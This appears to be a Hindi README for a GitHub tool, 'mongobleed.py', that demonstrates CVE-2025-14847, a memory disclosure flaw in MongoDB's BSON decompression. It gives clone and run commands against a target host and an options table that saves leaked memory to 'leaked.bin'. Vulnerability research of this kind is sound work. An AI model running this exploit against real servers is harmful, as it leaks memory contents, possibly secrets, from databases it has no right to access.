
शैक्षिक अनुसंधान उपकरण जो MongoDB के BSON डीकंप्रेशन में CVE-2025-14847 मेमोरी प्रकटीकरण को प्रदर्शित करता है। भेद्यता विश्लेषण के लिए सीमा-जाँच विफलताओं और मेमोरी सुरक्षा अवधारणाओं का अनुकरण करता है।
यह रिपॉजिटरी एक शैक्षिक अनुसंधान उपकरण है जो CVE-2025-14847 के पीछे मेमोरी सुरक्षा अवधारणाओं को प्रदर्शित करने के लिए डिज़ाइन किया गया है, जो MongoDB के BSON डीकम्प्रेशन कार्यान्वयन में खोजी गई एक गंभीर कमजोरी है। यह उपकरण दर्शाता है कि डीकम्प्रेशन के दौरान अनुचित सीमा जांच कैसे मेमोरी प्रकटीकरण का कारण बन सकती है।
यह उपकरण प्रदर्शित करता है:
पूर्वापेक्षाएँ
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
यह कमजोरी डेटाबेस सुरक्षा में व्यापक मुद्दों को उजागर करती है:
आधिकारिक संसाधन:
| विकल्प | डिफ़ॉल्ट | विवरण |
|---|
--host | localhost | लक्ष्य MongoDB होस्ट |
--port | 27017 | लक्ष्य MongoDB पोर्ट |
--min-offset | 20 | जांच करने के लिए न्यूनतम दस्तावेज़ लंबाई |
--max-offset | 8192 | जांच करने के लिए अधिकतम दस्तावेज़ लंबाई |
--output | leaked.bin | लीक डेटा के लिए आउटपुट फ़ाइल |